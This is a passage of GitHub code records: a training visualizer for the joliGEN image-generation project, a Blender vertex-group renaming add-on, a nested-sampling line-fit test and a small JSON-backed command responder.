/web/images/\n self.web_dir = os.path.join(opt.checkpoints_dir, opt.name, \"web\")\n self.img_dir = os.path.join(self.web_dir, \"images\")\n self.losses_path = os.path.join(self.web_dir, \"losses.json\")\n self.metrics_path = os.path.join(self.web_dir, \"metrics.json\")\n print(\"create web directory %s...\" % self.web_dir)\n util.mkdirs([self.web_dir, self.img_dir])\n # create a logging file to store training losses\n self.log_name = os.path.join(opt.checkpoints_dir, opt.name, \"loss_log.txt\")\n with open(self.log_name, \"a\") as log_file:\n now = time.strftime(\"%c\")\n log_file.write(\n \"================ Training Loss (%s) ================\\n\" % now\n )\n\n def reset(self):\n \"\"\"Reset the self.saved status\"\"\"\n self.saved = False\n\n def create_visdom_connections(self):\n \"\"\"If the program could not connect to Visdom server, this function will start a new server at port < self.port >\"\"\"\n cmd = sys.executable + \" -m visdom.server -p %d &>/dev/null &\" % self.port\n print(\"\\n\\nCould not connect to Visdom server. \\n Trying to start a server....\")\n print(\"Command: %s\" % cmd)\n Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)\n\n def display_current_results(\n self, visuals, epoch, save_result, params=[], first=False, phase=\"train\"\n ):\n if \"visdom\" in self.display_type:\n self.display_current_results_visdom(\n visuals, epoch, save_result, params, phase=phase\n )\n if \"aim\" in self.display_type:\n self.display_current_results_aim(visuals, epoch, save_result, params, first)\n\n def display_current_results_visdom(\n self, visuals, epoch, save_result, params, phase\n ):\n \"\"\"Display current results on visdom; save current results to an HTML file.\n\n Parameters:\n visuals (OrderedDict) - - dictionary of images to display or save\n epoch (int) - - the current epoch\n save_result (bool) - - if save the current results to an HTML file\n \"\"\"\n if self.display_id > 0: # show images in the browser using visdom\n ncols = self.ncols\n if ncols >= 0: # show all the images in one visdom panel\n max_ncol = 0\n for temp in visuals:\n if max_ncol < len(temp):\n max_ncol = len(temp)\n\n if ncols == 0:\n ncols = max_ncol\n else:\n ncols = min(ncols, max_ncol)\n\n h, w = next(iter(visuals[0].values())).shape[:2]\n table_css = \"\"\"\"\"\" % (\n w,\n h,\n ) # create a table css\n # create a table of images.\n title = self.name\n label_html = \"\"\n label_html_row = \"\"\n param_html = \"\"\n param_html_row = \"\"\n images = []\n idx = 0\n for param in params.items():\n param_html_row += \"| %s | \" % param[0]\n param_html_row += \"%s | \" % param[1]\n param_html += \"%s
\" % param_html_row\n param_html_row = \"\"\n\n for visual_group in visuals:\n label_html_row = \"\"\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n label_html_row += \"%s | \" % label\n images.append(image_numpy.transpose([2, 0, 1]))\n idx += 1\n if idx % ncols == 0:\n label_html += \"%s
\" % label_html_row\n label_html_row = \"\"\n white_image = np.ones_like(image_numpy.transpose([2, 0, 1])) * 255\n while idx % ncols != 0:\n images.append(white_image)\n label_html_row += \" | \"\n idx += 1\n if label_html_row != \"\":\n label_html += \"%s
\" % label_html_row\n try:\n if phase == \"train\":\n win_id = 1\n elif phase == \"test\":\n win_id = 2\n\n self.vis.images(\n images,\n nrow=ncols,\n win=self.display_id + win_id,\n padding=2,\n opts=dict(title=title + \" \" + phase + \" images\"),\n )\n label_html = \"\" % label_html\n param_html = \"\" % param_html\n self.vis.text(\n table_css + label_html,\n win=self.display_id + 3,\n opts=dict(title=title + \" labels\"),\n )\n self.vis.text(\n table_css + param_html,\n win=self.display_id + 4,\n opts=dict(title=title + \" params\"),\n )\n\n if self.nets_arch is not None:\n self.vis.text(\n \"\" + self.nets_arch + \"\",\n win=self.display_id + 5,\n opts=dict(title=title + \" architecture \"),\n )\n\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n else: # show each image in a separate visdom panel;\n idx = 1\n try:\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n self.vis.image(\n image_numpy.transpose([2, 0, 1]),\n opts=dict(title=label),\n win=self.display_id + idx,\n )\n idx += 1\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n if self.use_html and (\n save_result or not self.saved\n ): # save images to an HTML file if they haven't been saved.\n self.saved = True\n # save images to the disk\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n img_path = os.path.join(\n self.img_dir, \"epoch%.3d_%s.png\" % (epoch, label)\n )\n util.save_image(image_numpy, img_path)\n\n # update website\n webpage = html_util.HTML(\n self.web_dir, \"Experiment name = %s\" % self.name, refresh=0\n )\n for n in range(epoch, 0, -1):\n webpage.add_header(\"epoch [%d]\" % n)\n ims, txts, links = [], [], []\n\n for visual_group in visuals:\n for label, image_numpy in visual_group.items():\n image_numpy = util.tensor2im(image)\n img_path = \"epoch%.3d_%s.png\" % (n, label)\n ims.append(img_path)\n txts.append(label)\n links.append(img_path)\n webpage.add_images(ims, txts, links, width=self.win_size)\n webpage.save()\n\n # Save latest images\n\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n img_path = os.path.join(self.img_dir, \"latest_%s.png\" % label)\n util.save_image(image_numpy, img_path)\n\n def plot_current_losses(self, epoch, counter_ratio, losses):\n if \"visdom\" in self.display_type:\n self.plot_current_losses_visdom(epoch, counter_ratio, losses)\n if \"aim\" in self.display_type:\n self.plot_current_losses_aim(epoch, counter_ratio, losses)\n\n def plot_current_losses_aim(self, epoch, counter_ratio, losses):\n \"\"\"display the current losses on aim\"\"\"\n self.aim_run.track(losses, epoch=epoch, context={\"train\": True})\n\n def plot_current_losses_visdom(self, epoch, counter_ratio, losses):\n \"\"\"display the current losses on visdom display: dictionary of error labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n losses (OrderedDict) -- training losses stored in the format of (name, float) pairs\n \"\"\"\n if not hasattr(self, \"plot_data\"):\n self.plot_data = {\"X\": [], \"Y\": [], \"legend\": list(losses.keys())}\n self.plot_data[\"X\"].append(epoch + counter_ratio)\n if len(self.plot_data[\"legend\"]) == 1:\n self.plot_data[\"Y\"].append(losses[self.plot_data[\"legend\"][0]])\n X = np.array(self.plot_data[\"X\"])\n Y = np.array(self.plot_data[\"Y\"])\n else:\n self.plot_data[\"Y\"].append([losses[k] for k in self.plot_data[\"legend\"]])\n X = np.stack(\n [np.array(self.plot_data[\"X\"])] * len(self.plot_data[\"legend\"]), 1\n )\n Y = np.array(self.plot_data[\"Y\"])\n try:\n self.vis.line(\n Y,\n X,\n opts={\n \"title\": \" loss over time\",\n \"legend\": self.plot_data[\"legend\"],\n \"xlabel\": \"epoch\",\n \"ylabel\": \"loss\",\n },\n win=self.display_id,\n )\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n with open(self.losses_path, \"w\") as fp:\n json.dump(self.plot_data, fp)\n\n # losses: same format as |losses| of plot_current_losses\n def print_current_losses(self, epoch, iters, losses, t_comp, t_data_mini_batch):\n \"\"\"print current losses on console; also save the losses to the disk\n\n Parameters:\n epoch (int) -- current epoch\n iters (int) -- current training iteration during this epoch (reset to 0 at the end of every epoch)\n losses (OrderedDict) -- training losses stored in the format of (name, float) pairs\n t_comp (float) -- computational time per data point (normalized by batch_size)\n t_data (float) -- data loading time per data point (normalized by batch_size)\n \"\"\"\n message = (\n \"(epoch: %d, iters: %d, time comput per image: %.3f, time data mini batch: %.3f) \"\n % (epoch, iters, t_comp, t_data_mini_batch)\n )\n for k, v in losses.items():\n message += \"%s: %.6f \" % (k, v)\n\n print(message) # print the message\n with open(self.log_name, \"a\") as log_file:\n log_file.write(\"%s\\n\" % message) # save the message\n\n def display_current_results_aim(\n self, visuals, epoch, save_result, params=[], first=False\n ):\n \"\"\"Display results on aim\"\"\"\n if first == True: # fist call, record params\n self.aim_run[\"params\"] = params # hyper parameters\n\n # images\n import aim\n\n aim_images = []\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n aim_images.append(\n aim.Image(Image.fromarray(image_numpy), caption=label)\n )\n self.aim_run.track(\n aim_images, name=\"generated\", epoch=epoch, context={\"train\": True}\n )\n\n def display_img(self, img_path):\n im = Image.open(img_path)\n im = np.array(im)\n im = np.transpose(im, (2, 0, 1))\n img_name = img_path.split(\"/\")[-1].split(\".\")[0]\n self.vis.image(im, opts=dict(title=self.name + \" \" + img_name))\n\n def plot_metrics_dict(\n self, name, epoch, counter_ratio, metrics, title, ylabel, win_id\n ):\n \"\"\"Update a dict of metrics: labels and values and display it on visdom display\n\n Parameters:\n name (str) -- identifier of the plot\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n metrics (OrderedDict) -- metrics stored in format (name, float)\n title (str) -- Plot title\n ylabel (str) -- y label\n window_id (int) -- Visdom window id\n \"\"\"\n if name not in self.metrics_dict:\n self.metrics_dict[name] = {\"X\": [], \"Y\": [], \"legend\": list(metrics.keys())}\n plot_metrics = self.metrics_dict[name]\n plot_metrics[\"X\"].append(epoch + counter_ratio)\n plot_metrics[\"Y\"].append([metrics[k] for k in plot_metrics[\"legend\"]])\n X = np.stack([np.array(plot_metrics[\"X\"])] * len(plot_metrics[\"legend\"]), 1)\n Y = np.array(plot_metrics[\"Y\"])\n try:\n # Resize needed due to a bug in visdom 0.1.8.9\n if Y.shape[1] == 1:\n X = X.reshape(X.shape[:1])\n Y = Y.reshape(Y.shape[:1])\n\n self.vis.line(\n Y,\n X,\n opts={\n \"title\": self.name + \" \" + title,\n \"legend\": plot_metrics[\"legend\"],\n \"xlabel\": \"epoch\",\n \"ylabel\": ylabel,\n },\n win=self.display_id + win_id,\n )\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n with open(self.metrics_path, \"w\") as fp:\n json.dump(self.metrics_dict, fp)\n\n def plot_current_metrics(self, epoch, counter_ratio, metrics):\n \"\"\"display the current fid values on visdom display: dictionary of fid labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n fids (OrderedDict) -- training fid values stored in the format of (name, float) pairs\n \"\"\"\n self.plot_metrics_dict(\n \"metric\",\n epoch,\n counter_ratio,\n metrics,\n title=\"metrics over time\",\n ylabel=\"value\",\n win_id=6,\n )\n\n def plot_current_D_accuracies(self, epoch, counter_ratio, accuracies):\n \"\"\"display the current fid values on visdom display: dictionary of fid labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n accuracies (OrderedDict) -- accuracy values stored in the format of (name, float) pairs\n \"\"\"\n self.plot_metrics_dict(\n \"D_accuracy\",\n epoch,\n counter_ratio,\n accuracies,\n title=\"accuracy over time\",\n ylabel=\"accuracy\",\n win_id=7,\n )\n\n def plot_current_APA_prob(self, epoch, counter_ratio, p):\n self.plot_metrics_dict(\n \"APA_prob\",\n epoch,\n counter_ratio,\n p,\n title=\"APA params over time\",\n ylabel=\"prob APA\",\n win_id=8,\n )\n\n def plot_current_miou(self, epoch, counter_ratio, miou):\n \"\"\"display the current fid values on visdom display: dictionary of fid labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n miouf_s (OrderedDict) -- training miou_f_s values stored in the format of (name, float) pairs\n \"\"\"\n self.plot_metrics_dict(\n \"miou\",\n epoch,\n counter_ratio,\n miou,\n title=\"miou over time\",\n ylabel=\"miou\",\n win_id=9,\n )\n\n def print_networks(self, nets, verbose):\n \"\"\"Print the total number of parameters in the network and (if verbose) network architecture\n\n Parameters:\n nets (dict) -- dict of networks to display\n verbose (bool) -- if verbose: print the network architecture\n \"\"\"\n print(\"---------- Networks initialized -------------\")\n self.nets_arch = \"\"\n for name in nets.keys():\n if isinstance(name, str):\n net = nets[name]\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n if verbose:\n self.nets_arch += (\n \"\\n---------------------------------------------------\\n\"\n )\n self.nets_arch += \"[Network %s]\" % (name)\n self.nets_arch += \"\\n\" + str(summary(net, depth=12))\n self.nets_arch += (\n \"\\n---------------------------------------------------\\n\"\n )\n else:\n self.nets_arch = None\n\n print(\n \"[Network %s] Total number of parameters : %.3f M\"\n % (name, num_params / 1e6)\n )\n\n print(\"-----------------------------------------------\")\n\n def load_data(self):\n if os.path.isfile(self.losses_path):\n with open(self.losses_path, \"r\") as fp:\n self.plot_data = json.load(fp)\n next_epoch = math.ceil(self.plot_data[\"X\"][-1])\n else:\n next_epoch = self.opt.train_epoch_count\n\n if os.path.isfile(self.metrics_path):\n with open(self.metrics_path, \"r\") as fp:\n self.metrics_dict = json.load(fp)\n\n return next_epoch\n","repo_name":"jolibrain/joliGEN","sub_path":"util/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":22265,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"2"}
+{"seq_id":"4098204529","text":"import bpy\r\nfrom bpy_extras.io_utils import ImportHelper, ExportHelper\r\nimport csv\r\n\r\nbl_info = {\r\n \"name\": \"VertexGroup Renamer\",\r\n \"author\": \"takec\",\r\n \"version\": (1, 2),\r\n \"blender\": (3, 4, 0),\r\n \"location\": \"View3D > Tool Shelf > Renamer > VertexGroup Renamer\",\r\n \"description\": \"Renames vertex groups based on bone mappings\",\r\n \"category\": \"Object\"\r\n}\r\n\r\n\r\nclass MappingPairProperty(bpy.types.PropertyGroup):\r\n src: bpy.props.StringProperty(name=\"src\")\r\n dst: bpy.props.StringProperty(name=\"dst\")\r\n\r\n\r\nclass VertexGroupRenamerProperties(bpy.types.PropertyGroup):\r\n armature_source: bpy.props.PointerProperty(\r\n name=\"src\",\r\n type=bpy.types.Object,\r\n poll=lambda self, obj: obj.type == \"ARMATURE\"\r\n )\r\n armature_target: bpy.props.PointerProperty(\r\n name=\"trg\",\r\n type=bpy.types.Object,\r\n poll=lambda self, obj: obj.type == \"ARMATURE\"\r\n )\r\n bone_max_distance: bpy.props.FloatProperty(\r\n name=\"max distance\",\r\n default=1.0,\r\n min=0,\r\n step=1,\r\n precision=6,\r\n unit=\"LENGTH\",\r\n )\r\n mapping_collection: bpy.props.CollectionProperty(\r\n type=MappingPairProperty,\r\n )\r\n mapping_active_index: bpy.props.IntProperty()\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_UL_MappingPair(bpy.types.UIList):\r\n def draw_item(self,\r\n context,\r\n layout:bpy.types.UILayout,\r\n data,\r\n item,\r\n icon,\r\n active_data,\r\n active_peoperty,\r\n index,\r\n flt_flag):\r\n enable = (flt_flag & self.bitflag_filter_item)\r\n if self.use_filter_invert:\r\n enable = not enable\r\n if enable:\r\n if item[\"src\"] == item[\"dst\"]:\r\n layout.label(icon=\"CHECKMARK\")\r\n else:\r\n layout.label(icon=\"BLANK1\")\r\n layout.prop(item, \"src\", text=\"\", emboss=False, translate=False)\r\n layout.prop(item, \"dst\", text=\"\", emboss=False, translate=False)\r\n\r\n def filter_items(self, context, data, propname):\r\n items = getattr(data, propname)\r\n flt_flags = []\r\n flt_neworder = []\r\n\r\n if self.filter_name:\r\n flt_flags = bpy.types.UI_UL_list.filter_items_by_name(\r\n self.filter_name, self.bitflag_filter_item, items, \"src\"\r\n )\r\n else:\r\n flt_flags = [self.bitflag_filter_item] * len(items)\r\n\r\n if self.use_filter_sort_alpha:\r\n flt_neworder = bpy.types.UI_UL_list.sort_items_by_name(items, \"src\")\r\n\r\n return flt_flags, flt_neworder\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Add(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_add\"\r\n bl_label = \"add mapping_pair to collection\"\r\n\r\n def execute(self, context):\r\n context.scene.VertexGroupRenamerProperty.mapping_collection.add()\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Remove(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_remove\"\r\n bl_label = \"remove mapping_pair from collection\"\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n active_index = props.mapping_active_index\r\n mapping_collection.remove(active_index)\r\n active_index = min(active_index, len(mapping_collection) - 1)\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Clear(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_clear\"\r\n bl_label = \"clear mapping collection\"\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n mapping_collection.clear()\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Import(bpy.types.Operator, ImportHelper):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_import\"\r\n bl_label = \"import mapping from csv\"\r\n filter_glob: bpy.props.StringProperty(\r\n default=\"*.csv\",\r\n options={\"HIDDEN\"},\r\n )\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n mapping_collection.clear()\r\n with open(self.filepath, \"r\", encoding=\"utf-8\", newline=\"\") as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n pair = mapping_collection.add()\r\n pair.src = row[0]\r\n pair.dst = row[1]\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Export(bpy.types.Operator, ExportHelper):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_export\"\r\n bl_label = \"export mapping to csv\"\r\n filename_ext = \".csv\"\r\n filter_glob: bpy.props.StringProperty(\r\n default=\"*.csv\",\r\n options={\"HIDDEN\"},\r\n )\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n with open(self.filepath, \"w\", encoding=\"utf-8\", newline=\"\") as f:\r\n writer = csv.writer(f)\r\n for pair in mapping_collection:\r\n writer.writerow((pair.src, pair.dst))\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_MT_MappingCollection_Special(bpy.types.Menu):\r\n bl_idname = \"VERTEX_GROUP_RENAMER_MT_mapping_collection_special\"\r\n bl_label = \"mapping collection's menu\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Clear.bl_idname, text=\"Clear\", icon=\"TRASH\")\r\n layout.separator()\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Import.bl_idname, text=\"import from csv\")\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Export.bl_idname, text=\"export to csv\")\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_PT_ToolShelf(bpy.types.Panel):\r\n bl_idname = \"VERTEX_GROUP_RENAMER_PT_tool_shelf\"\r\n bl_label = \"VertexGroup Renamer\"\r\n bl_space_type = \"VIEW_3D\"\r\n bl_region_type = \"UI\"\r\n bl_category = \"Renamer\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n scene = context.scene\r\n props = scene.VertexGroupRenamerProperty\r\n layout.label(text=\"Armature pair\")\r\n layout.prop(props, \"armature_source\")\r\n layout.prop(props, \"armature_target\")\r\n layout.prop(props, \"bone_max_distance\")\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_GetMappingFromArmaturePair.bl_idname, text=\"Get Mapping from Armature\")\r\n layout.separator()\r\n\r\n layout.label(text=\"Mapping Pair\")\r\n row = layout.row()\r\n row.template_list(\r\n VERTEX_GROUP_RENAMER_UL_MappingPair.__name__, \"\",\r\n props, \"mapping_collection\", props, \"mapping_active_index\")\r\n side = row.column()\r\n col = side.column(align=True)\r\n col.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Add.bl_idname, text=\"\", icon=\"ADD\")\r\n col.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Remove.bl_idname, text=\"\", icon=\"REMOVE\")\r\n side.separator()\r\n side.menu(VERTEX_GROUP_RENAMER_MT_MappingCollection_Special.bl_idname, text=\"\", icon=\"DOWNARROW_HLT\")\r\n\r\n layout.separator()\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_Rename.bl_idname, text=\"Rename VertexGroup\")\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_GetMappingFromArmaturePair(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.get_mapping_from_armature_pair\"\r\n bl_label = \"get mapping from armature pair\"\r\n bl_description = \"get mapping from armature pair.\"\r\n bl_options = {\"REGISTER\", \"UNDO\"}\r\n\r\n def execute(self, context):\r\n scene = context.scene\r\n props = scene.VertexGroupRenamerProperty\r\n armature_src = props.armature_source\r\n armature_dst = props.armature_target\r\n bone_max_distance = props.bone_max_distance\r\n mapping_collection = props.mapping_collection\r\n\r\n if (armature_src is None) or (armature_dst is None):\r\n return {\"CANCELLED\"}\r\n\r\n matrix_world_src = armature_src.matrix_world\r\n matrix_world_dst = armature_dst.matrix_world\r\n\r\n # マッピング情報を取得\r\n bone_mapping = {}\r\n\r\n for bone_src in armature_src.data.bones:\r\n mapped_bone = None\r\n # 名前を元にマッピング\r\n for bone_trg in armature_dst.data.bones:\r\n if bone_src.name == bone_trg.name:\r\n mapped_bone = bone_trg\r\n break\r\n\r\n if mapped_bone is not None:\r\n bone_mapping[bone_src.name] = mapped_bone.name\r\n continue\r\n\r\n # 同じ名前のボーンが無く、同じ階層のボーンがあれば、Headが一番近いボーンにマッピング\r\n bone_src_depth = len(bone_src.parent_recursive)\r\n minimum_distance = None\r\n for bone_trg in armature_dst.data.bones:\r\n bone_trg_depth = len(bone_trg.parent_recursive)\r\n if bone_src_depth == bone_trg_depth:\r\n src_pos = matrix_world_src @ bone_src.head_local\r\n dst_pos = matrix_world_dst @ bone_trg.head_local\r\n distance = (src_pos - dst_pos).length\r\n if (\r\n (distance <= bone_max_distance)\r\n and ((minimum_distance is None) or (minimum_distance > distance))\r\n ):\r\n minimum_distance = distance\r\n mapped_bone = bone_trg\r\n\r\n # マッピング先が無ければ、空文字でマッピング\r\n if mapped_bone is not None:\r\n bone_mapping[bone_src.name] = mapped_bone.name\r\n else:\r\n bone_mapping[bone_src.name] = \"\"\r\n\r\n # mappingをコレクションに変換\r\n mapping_collection.clear()\r\n for src, dst in bone_mapping.items():\r\n pair = mapping_collection.add()\r\n pair.src = src\r\n pair.dst = dst\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_Rename(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.rename\"\r\n bl_label = \"Rename VertexGroup\"\r\n bl_description = \"Rename VertexGroup with mapping.\"\r\n bl_options = {\"REGISTER\", \"UNDO\"}\r\n\r\n def execute(self, context):\r\n mapping = {}\r\n mapping_collection = context.scene.VertexGroupRenamerProperty.mapping_collection\r\n for pair in mapping_collection:\r\n mapping[pair.src] = pair.dst\r\n\r\n # 選択したMeshのVertex Group名を変更\r\n for obj in bpy.context.selected_objects:\r\n if obj.type == \"MESH\":\r\n vg_name_list = [vg.name for vg in obj.vertex_groups]\r\n for src_name in vg_name_list:\r\n if src_name not in mapping:\r\n continue\r\n dst_name = mapping[src_name]\r\n if (dst_name == \"\") or (src_name == dst_name):\r\n continue\r\n if dst_name in [vg.name for vg in obj.vertex_groups]:\r\n # add weight to dst and delete src\r\n src_vg = obj.vertex_groups[src_name]\r\n dst_vg = obj.vertex_groups[dst_name]\r\n for v in obj.data.vertices:\r\n try:\r\n weight = src_vg.weight(v.index)\r\n dst_vg.add([v.index], weight, \"ADD\")\r\n except RuntimeError:\r\n pass\r\n obj.vertex_groups.remove(src_vg)\r\n else:\r\n # rename\r\n src_vg = obj.vertex_groups[src_name]\r\n src_vg.name = dst_name\r\n\r\n return {\"FINISHED\"}\r\n\r\n\r\nclasses = [\r\n MappingPairProperty,\r\n VertexGroupRenamerProperties,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Add,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Remove,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Clear,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Import,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Export,\r\n VERTEX_GROUP_RENAMER_MT_MappingCollection_Special,\r\n VERTEX_GROUP_RENAMER_UL_MappingPair,\r\n VERTEX_GROUP_RENAMER_OT_Rename,\r\n VERTEX_GROUP_RENAMER_OT_GetMappingFromArmaturePair,\r\n VERTEX_GROUP_RENAMER_PT_ToolShelf,\r\n]\r\n\r\n\r\ndef register():\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n bpy.types.Scene.VertexGroupRenamerProperty = bpy.props.PointerProperty(type=VertexGroupRenamerProperties)\r\n\r\n\r\ndef unregister():\r\n del bpy.types.Scene.VertexGroupRenamerProperty\r\n for cls in reversed(classes):\r\n bpy.utils.unregister_class(cls)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n register()\r\n","repo_name":"takecccc/vertex_group_renamer","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"40621104047","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom ensnest import mpNestedSampler, model\nfrom ensnest import stdplots\n\nclass lineModel(model.Model):\n\n def set_parameters(self,data):\n self.names = ['A', 'mu', 'line_sigma', 'noise_sigma']\n self.bounds = [[0.05, 10.], [0., 64.], [0.05, 10.], [0.5, 5.]]\n self.data = data\n self.x = np.arange(0,64, step=1)\n\n def f(self, A ,mu,sigma, x):\n return A*np.exp(- ((x - mu)/sigma)**2)\n\n def log_errs(self, t):\n return -0.5*t**2\n\n @model.Model.varenv\n def log_likelihood(self, vars):\n '''L is the product of the error function calculated in the residual (data - model)'''\n logl = np.zeros(vars.shape)\n for x_,d_ in zip(self.x, self.data):\n logl += self.log_errs( (self.f(vars['A'], vars['mu'], vars['line_sigma'], x_) - d_)/vars['noise_sigma'])\\\n - np.log(vars['noise_sigma']) - 0.5*np.log(2*np.pi)\n return logl\n\n @model.Model.auto_bound\n @model.Model.varenv\n def log_prior(self, vars):\n return -np.log(vars['A']*vars['line_sigma'])\n\n\ndata = np.array([1.42, 0.468, 0.762,\n -1.312, 2.029, 0.086,\n 1.249, -0.368, -0.657,\n -1.294, 0.235, -0.192,\n -0.269,0.827,-0.685,\n -0.702,-0.937,1.331,\n -1.772,-0.530,0.330,\n 1.205,1.613,0.3,\n -0.046,-0.026,-0.519,\n 0.924,0.230,0.877,\n -0.650,-1.004,0.248,\n -1.169,0.915,1.113,\n 1.463,2.732,0.571,\n 0.865,-0.849,-0.171,\n 1.031,1.105,-0.344,\n -0.087,-0.351,1.248,\n 0.001,0.360,-0.497,\n -0.072,1.094,-1.425,\n 0.283,-1.526,-1.174,\n -0.558,1.282,-0.384,\n -0.120,-0.187,0.646,0.399])\n\nM = lineModel(data)\nns = mpNestedSampler(M, nlive=1000, evosteps=400, filename='line', load_old=False)\nns.run()\n\nstdplots.hist_points(ns)\nstdplots.XLplot(ns)\n\nfig, ax = plt.subplots(1)\nplt.plot(M.x, M.data)\n\nx_ = np.linspace(min(M.x), max(M.x), 1000)\nsamp = ns.ew_samples['position'].copy().astype(M.position_t)\nm = np.zeros((len(samp), len(x_)))\nfor i in range(len(samp)):\n m[i] = M.f(samp['A'][i], samp['mu'][i], samp['line_sigma'][i], x_)\n\nplt.plot(x_, np.mean(m, axis=0))\np20,p80 = np.percentile(m,[20,80], axis=0)\n\nplt.fill_between(x_,p20, p80, zorder = -100, color = 'turquoise', alpha=0.5)\nplt.savefig('line.png')\n","repo_name":"djanloo/ensnest","sub_path":"test/line_inference_test.py","file_name":"line_inference_test.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"19946630048","text":"import json\n\nfrom graphresponder import UnknownCommand\n\n\nclass GraphResponder(object):\n \"\"\"A stateful responder which stores its command-response pairs in a graph.\n Calling the response() method does depth-traversal.\"\"\"\n\n GRAPH_BLACKLIST_KEYS = ['_edges']\n\n def __init__(self, filename='graph.json'):\n self.filename = filename\n self.load()\n self.stack = None\n\n def reset_state(self):\n \"\"\"Reset the pointer to the root of the graph\"\"\"\n self.stack = None\n\n def load(self):\n \"\"\"Load graph from JSON file\"\"\"\n try:\n with open(self.filename) as graph_file:\n self.graph = json.load(graph_file)\n except IOError:\n self.graph = {}\n\n def response(self, command):\n \"\"\"Return the response for a particular command\"\"\"\n try:\n if self.stack:\n response = self.stack[command]['value']\n self.stack = self.stack[command]['_edges']\n else:\n response = self.graph[command]['value']\n self.stack = self.graph[command]['_edges']\n return response\n except KeyError:\n raise UnknownCommand\n\n def known_commands(self):\n \"\"\"Return the list of known commands at the current tree depth\"\"\"\n if self.stack:\n commands = self._get_keys(self.stack)\n else:\n commands = self._get_keys(self.graph)\n return commands\n\n def _get_keys(self, dictionary):\n \"\"\"Exclude meta-keys from the graph dictionary\"\"\"\n return [key for key in dict.keys(dictionary) if key not in self.GRAPH_BLACKLIST_KEYS]\n\n\nRESPONDER = GraphResponder()\n","repo_name":"tgenov/MSC2018-Code","sub_path":"cowrie-session-graph/graphresponder.py","file_name":"graphresponder.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
